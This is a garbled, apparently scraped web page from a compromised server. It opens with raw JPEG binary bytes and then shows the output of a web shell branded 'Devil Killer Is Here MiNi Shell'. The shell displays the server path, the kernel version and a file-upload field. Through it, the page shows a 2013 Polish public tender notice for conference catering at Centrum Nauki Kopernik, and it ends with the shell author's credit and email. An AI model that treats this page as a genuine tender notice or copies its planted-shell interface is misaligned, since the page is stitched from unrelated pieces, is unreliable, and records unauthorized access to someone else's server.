JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130730/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130730/302544-N-2013.html

<p class="kh_header"><b>Warszawa: Świadczenie kompleksowych usług cateringowych dla uczestników konferencji pn. Pokazać - Przekazać w dniach 23-24 sierpnia 2013 r. w Centrum Nauki Kopernik; nr postępowania: PO ZP 27 2013 CNK IS</b><br>
<b>Numer ogłoszenia: 302544 - 2013; data zamieszczenia: 30.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Nauki Kopernik , ul. Wybrzeże Kościuszkowskie 20, 00-390 Warszawa, woj. mazowieckie, tel. 22 596 41 11, faks 22 596 41 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury -Rejestr Instytucji Kultury prow. przez Prezyd. m. st. W-wy pod nr 2/06.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowych usług cateringowych dla uczestników konferencji pn. Pokazać - Przekazać w dniach 23-24 sierpnia 2013 r. w Centrum Nauki Kopernik; nr postępowania: PO ZP 27 2013 CNK IS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu Zamówienia; zamówienia uzupełniające.
1.	Przedmiotem zamówienia jest świadczenie kompleksowych usług cateringowych, polegających na przygotowywaniu i serwowaniu, w warunkach restauracyjnych, cateringu podczas konferencji pn. Pokazać - Przekazać, organizowanej w ramach projektu Programu Operacyjnego Kapitał Ludzki pn. Opracowanie i pilotaż aktywnych metod pracy nauczyciela z uczniem opartych na metodzie badawczej, współfinansowanego ze środków Europejskiego Funduszu Społecznego.
2.	Kod CPV:
55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków.
3.	Miejsce wykonania Zamówienia:
Usługa cateringowa będzie świadczona w siedzibie Centrum Nauki Kopernik, 
ul. Wybrzeże Kościuszkowskie 20, 00-390 Warszawa.
4.	Zakres usługi obejmuje:
1)	Zapewnienie całodziennego serwisu kawowego, dla 290 osób każdego dnia:
a)	w dniu 23 sierpnia br. w godz. od 09:30 do godz. 21:00 oraz 
b)	w dniu 24 sierpnia br., w godz. od 08:30 do godz. 14:30.
Całodzienny serwis kawowy powinien zawierać: kawa czarna, mielona zaparzana w termosach -  bez ograniczeń, wybór herbat - min 4 rodzaje do wyboru (w tym mięta i herbata owocowa), woda gorąca do zaparzenia,  w termosach -  bez ograniczeń, woda niegazowana w butelkach o pojemności nie większej niż 0,5 l - bez ograniczeń,
woda gazowana w butelkach o pojemności nie większej niż 0,5 l - bez ograniczeń,soki owocowe 100%, minimum 4 rodzaje: pomarańczowy, czarna porzeczka, jabłko, grejpfrutowy - bez ograniczeń,cukier biały i brązowy trzcinowy,  w saszetkach, po min. 5 g każda - bez ograniczeń,mleko 3,2 % UHT  - bez ograniczeń,cytryna - bez ograniczeń, galanteria cukiernicza - minimum 3 rodzaje kruchych ciasteczek przez cały dzień - bez ograniczeń.
2)	Dwie przerwy kawowe, dla 290 osób, każdego dnia:
a)w dniu 23 sierpnia br. od około godziny 11:30 o czasie trwania 30 minut oraz 
b)	w dniu 24 sierpnia br. od około godziny 10:00 o czasie trwania 30 minut 
polegająca na rozszerzeniu serwisu kawowego, opisanego w pkt. 10.4.1. powyżej, o: 
minimum 3 rodzaje świeżo pieczonych ciast, podanych na paterach, porcjowanych - 1 porcja min. 100 g oraz minimum 1 rodzaj croissantów po min. 60 g sztuka -  po min. 2 porcje ciasta i 1 porcje croissanta na osobę, świeże owoce, minimum 4 rodzaje, po tyle samo każdego rodzaju (w tym jabłka, banany, pomarańcze i do wyboru: brzoskwinie, nektarynki, gruszki, arbuz porcjowany po min. 200 g porcja, winogron jasnych i/lub ciemnych po 70 g porcja) min. 2 sztuki/porcje owoców do wyboru na osobę.

Zamawiający informuje, iż godzina rozpoczęcia przerw kawowych może ulec przesunięciu do 15 minut.

3)	Przegotowanie ciepłego posiłku - lunchu, serwowanego  w formie szwedzkiego stołu, wraz z obsługą, dla 290 osób:
a)	w dn. 23 sierpnia br., w godz. od 14:00 do godz. 15:00 oraz 
b)	w dn. 24 sierpnia br. w godz. od 13:30 do 14:30,
składającego się z:
a) pierwszego dania - zapewnienie dla każdej osoby porcji zupy, nie mniejszej niż 250 ml;
b) drugiego dania, składającego się z:
- dania mięsnego: dla każdej osoby -  wybór minimum dwóch rodzajów mięs, pierwszy rodzaj: wołowe lub wieprzowe, drugi rodzaj: kurze lub z indyka - porcja min. 150 g na osobę; 
- dania bezmięsnego: dla każdej osoby wybór: ryba w sosie lub danie z grzybów lub pieczonych warzyw - porcja min.150 g na osobę;
- ziemniaków - porcja minimum 100 g. na osobę oraz do wyboru 1 z 3: makaron, ryż, kasza (pęczak lub gryczana, lub jęczmienna) - porcja minimum 100 g  na osobę;
- wybór 3 rodzajów sałat z dressingiem i/lub surówek, i/lub minimum 
3 składnikowych mieszanek gotowanych warzyw - porcja minimum po 50 g każdego rodzaju na osobę.
Deseru, składającego się z:
 - wybór min. 5 rodzajów świeżych, sezonowych owoców, w tym: jabłka, banany, pomarańcze i do wyboru: brzoskwinie, nektarynki, gruszki, arbuz porcjowany, porcja min. 200 g, winogrona jasne i/lub ciemne, po 70 g porcja) - minimum 2 sztuki/porcje różnych owoców na osobę;
- deser w formie wyboru świeżo pieczonych ciast porcjowanych - minimum 
4 rodzaje, po min. 100 g każda porcja,  minimum po 2 porcje na osobę;
4)	Przygotowanie  w dn. 23 sierpnia br., w godz. od 19:00 do godz. 21:30, ciepłego posiłku dla 290 osób -  kolacji, serwowanego w formie szwedzkiego stołu, wraz z obsługą, obejmującego bufet, składający się z: 
a)	ciepłego dania mięsnego: dla każdej osoby wybór minimum 2 rodzajów mięs lub potraw mięsnych - porcja minimum 150 g na osobę; 
b)	danie bezmięsne: dla każdej osoby ciepłe danie warzywne lub ciepłe danie makaronowe - porcja minimum 150 g na osobę;
c)	wybór min. 2 rodzajów zimnych i 1 rodzaju ciepłych przystawek mięsnych i/lub rybnych - po 2 szt. każdego rodzaju na osobę, min. 40 g każda;
d)	wybór minimum jednego rodzaju zimnych i jednego rodzaj ciepłych przystawek wegetariańskich (na przykład: gniazda cukinii z puree paprykowym lub nadziewane pomidory z ciecierzycą i kolendrą) - po 2 sztuki każdego rodzaju na osobę, minimum 40 g każda;
e)	wybór wędlin i mięs pieczonych, i serów (w tym m.in. sery dojrzewające, pleśniowe, sery twarde typu edamski, gouda, podlaski lub inne)  - w proporcji 50% wędlin i mięs, do 50% serów, min. 200 g (100 g wędlin i mięs i 100 g serów) na osobę;
f)	wybór świeżych, pokrojonych warzyw - min. 4 rodzaje (np. pomidor, ogórek, marchew, seler naciowy, rzodkiew, kalarepa) - min. po 50 g każdego  
z warzyw na osobę;
g)	wybór min. 2 rodzajów dipów stosownych do rodzaju warzyw, opisanych 
w lit. f) powyżej - ilość dipów odpowiednia do ilości warzyw;
h)	wybór pieczywa porcjowanego/krojonego, min. 3 rodzaje (białe, razowe, bułeczki białe) - po min. 30 g  każda, min. 3 porcje/ kromki  na osobę;
i)	deser w formie świeżo pieczonych ciast i ciasteczek porcjowanych, do wyboru 
min. 4 rodzaje ciast i ciasteczek,  porcja min. 100 g , minimum  3 porcje różnych rodzajów ciast/ciasteczek na osobę;
j)	wybór min. 5 rodzajów świeżych, sezonowych owoców, w tym: jabłka, banany, pomarańcze i do wyboru: brzoskwinie, nektarynki, gruszki, arbuz porcjowany 
po min. 200 g porcja, winogrona jasne i/lub ciemne, po 70 g porcja) 
- minimum 2 sztuki/porcje różnych owoców na osobę.
5)	Wymagane jest, aby oba lunche i kolacja różniły się od siebie rodzajem potraw, 
w tym: podanej zupy, dania mięsnego, dania bezmięsnego, sałatami oraz ciastami, a także sposobem przygotowania i/lub podania: ziemniaków, makaronu, ryżu i kasz, (np.  ziemniaki gotowane /pieczone, makaron penne z oliwą z oliwek 
i czosnkiem, makaron spaghetti z ziołami, ryż z kurkumą i ziołami, ryż gotowany 
na sypko, kasza jęczmienna z przyprawami itd.)
6)	Do przygotowania posiłków powinny być użyte świeże, wysokiej jakości składniki, zarówno co do wartości odżywczej, jak i gramatury.
7)	Temperatura dań podawanych na ciepło nie powinna być niższa niż 75 st. C - zupy oraz 63 st. C  drugie dania i dania serwowane na ciepło.
8)	Dania ciepłe, powinny być dostarczone i serwowane z podgrzewanych lub trzymających ciepło, chromowanych bemarów,  dania zimne i desery powinny być podane na ceramicznych półmiskach lub chromowanych tacach, sałatki 
w ceramicznych lub szklanych miskach, sztućce powinny być stalowe - nierdzewne, do zimnych napojów i wody powinny być zapewnione szklanki i ponadto winny być zapewnione papierowe, trójwarstwowe serwetki, oraz obrusy w kolorze białym lub czarnym, wykonane z tkaniny. 
9)	Ilość całej zastawy powinna być adekwatna do ilości osób oraz odpowiednia 
do ilości i rodzajów serwowanych dań.  Zastawa powinna być jednolita, Ponadto Wykonawca zapewni minimum 15 szt. stołów bufetowych, a także min. 30 szt. stołów koktajlowych wraz z nakryciami (tj. serwety i/lub obrusy) w jednolitym kolorze  białym lub czarnym. 
10)	Wykonawca zobowiązuje się zapewnić profesjonalną obsługę kelnerską. Ilość obsługi kelnerskiej powinna zapewnić sprawną i płynną obsługę uczestników konferencji, być stosowna do ilości osób, nie mniej jednak 
niż 6 kelnerów(ek) ubranych w jednolite stroje, w kolorach biało-czarnych.
11)	Zamawiający zapewnia zaplecze techniczne wielkości ponad 20 m2 na sprzęt 
i jedzenie, a także możliwość podłączenia urządzeń do 5 źródeł prądu 
o natężeniu 16A każde. W przypadku potrzeby większej ilości źródeł prądu Wykonawca na swój koszt, zapewnia agregat prądotwórczy wraz z transportem, paliwem, obsługą i okablowaniem.
12)	Wykonawca, w ramach przedmiotu Zamówienia, zobowiązany jest do usunięcia 
i wywozu nieczystości i odpadów pokonsumpcyjnych na swój koszt.
13)	Wykonawca na swój koszt i ryzyko dostarczy przedmiot Zamówienia na miejsce wykonywania usługi tj. do Centrum Nauki Kopernik (00-390) Warszawa, 
ul. Wybrzeże Kościuszkowskie 20.
14)	Wykonawca zobowiązany jest do wykonania przedmiotu Zamówienia, zgodnie 
z wymogami sanitarnymi dotyczącymi żywności i wyżywienia zbiorowego,
w szczególności za przygotowanie i podanie potraw oraz obsługę kelnerską.
15)	Do obowiązków Wykonawcy należy również rozstawienie stołów bufetowych 
i koktajlowych wg. wskazań Zamawiającego.
5.	Ponadto opis przedmiotu Zamówienia określa wzór Umowy - Załącznik nr 2 
do SIWZ.

Zamawiający informuje, iż w związku z tym, iż przedmiot Zamówienia stanowią usługi 
o charakterze niepriorytetowym, wyszczególnione w Wykazie Usług o Charakterze Niepriorytetowym, stanowiącym Załącznik nr 2 do Rozporządzenia Prezesa Rady Ministrów z dnia 28 stycznia 2010 r. poz. 68, wydanego na podstawie art. 2a i 2b Ustawy, zgodnie 
z art. 5  ust. 1 Ustawy nie stosuje się przepisów Ustawy dotyczących terminów składania wniosków o dopuszczenie do udziału w Postępowaniu lub terminu składania Ofert, obowiązku żądania wadium, obowiązku żądania dokumentów potwierdzających spełnienie warunku udziału w Postępowaniu, zakazu ustalania kryteriów oceny ofert na podstawie właściwości Wykonawcy oraz przesłanek wyboru trybu negocjacji z ogłoszenie, dialogu konkurencyjnego oraz licytacji elektronicznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w przedmiotowym Postępowaniu nie wymaga wniesienia przez Wykonawców wadium jako zabezpieczenia złożonej Oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj.: posiadają uprawnienia do wykonywania działalności objętej Ofertą (tzn. posiadają aktualną koncesję - zezwolenie na prowadzenie działalności gastronomicznej oraz zgodę Stacji Sanitarno Epidemiologicznej i inne niezbędne pozwolenia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania Ofert, a jeżeli okres prowadzenia działalności jest krótszy 
- w tym okresie, co najmniej 2 (dwie) usługi, polegające na przygotowaniu 
i podawaniu posiłków jednorazowo dla minimum 250 osób,  przy czym wartość każdej usługi jest nie mniejsza niż 50 000 zł netto (słownie: pięćdziesiąt tysięcy netto) oraz wykaże, iż usługi te zostały wykonane należycie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest złożyć: w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Uwaga!
Oświadczenie podmiotu trzeciego, aby mogło być uznane za dowód potwierdzający dysponowanie zasobami tego podmiotu, musi posiadać zarówno stosowną treść, z której będzie wynikało, że podmiot ten zobowiązał się do udostępnienia wykonawcy określonych zasobów na okres korzystania z nich przy wykonaniu Zamówienia, jak i formę pisemną oraz, dla swej skuteczności, musi także zostać złożone przez osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie. Mając na uwadze powyższe, w przypadku złożenia zobowiązania podmiotu trzeciego, Wykonawca zobowiązany jest również do złożenia dowodów, że osoba podpisująca takie zobowiązanie, była uprawniona do działania w imieniu podmiotu trzeciego (dokumenty uprawniające do reprezentacji). 
Ze złożonego dokumentu winien wynikać: zakres zobowiązania podmiotu trzeciego, rodzaj i zakres udostępnianych zasobów, sposób udostępnienia zasobów, nazwa podmiotu (nazwa Wykonawcy), któremu zasoby zostaną udostępnione, charakter stosunku łączącego Wykonawcę z podmiotem trzecim, okres, na  który podmiot trzeci udostępnia zasoby, a w przypadku gdy przedmiotem udostępnienia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia bez zaangażowania tego podmiotu w wykonanie zamówienia (w szczególności dotyczy to wiedzy i doświadczenia podmiotu trzeciego), taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu
w wykonaniu Zamówienia, wraz ze wskazaniem zakresu i okresu uczestnictwa podmiotu trzeciego w wykonaniu Zamówienia, gwarantującego realne przekazanie zasobów, na których polega Wykonawca.
2. pełnomocnictwo - o ile dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	gdy konieczność wprowadzenia zmian będzie następstwem zmiany stawki VAT, przy czym zmianie ulegnie kwota VAT i kwota brutto;
2)	zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Zamówienia;
3)	wystąpienia siły wyższej, co uniemożliwia wykonanie przedmiotu Umowy zgodnie z SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.org.pl; www.bip.kopernik.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 00-312 Warszawa, ul. Dobra 56/66, biuro Centrum Nauki Kopernik, u Pani Izabelli Starzyńskiej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2013 godzina 16:00, miejsce: 00-390 Warszawa, ul. Wybrzeże Kościuszkowskie 20 w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  pn.Opracowanie i pilotaż aktywnych metod pracy nauczyciela z uczniem opartych na metodzie badawczej- współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego 
Program Operacyjny Kapitał Ludzki, 
Poddziałanie 3.3.3 - Modernizacja treści i metod kształcenia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com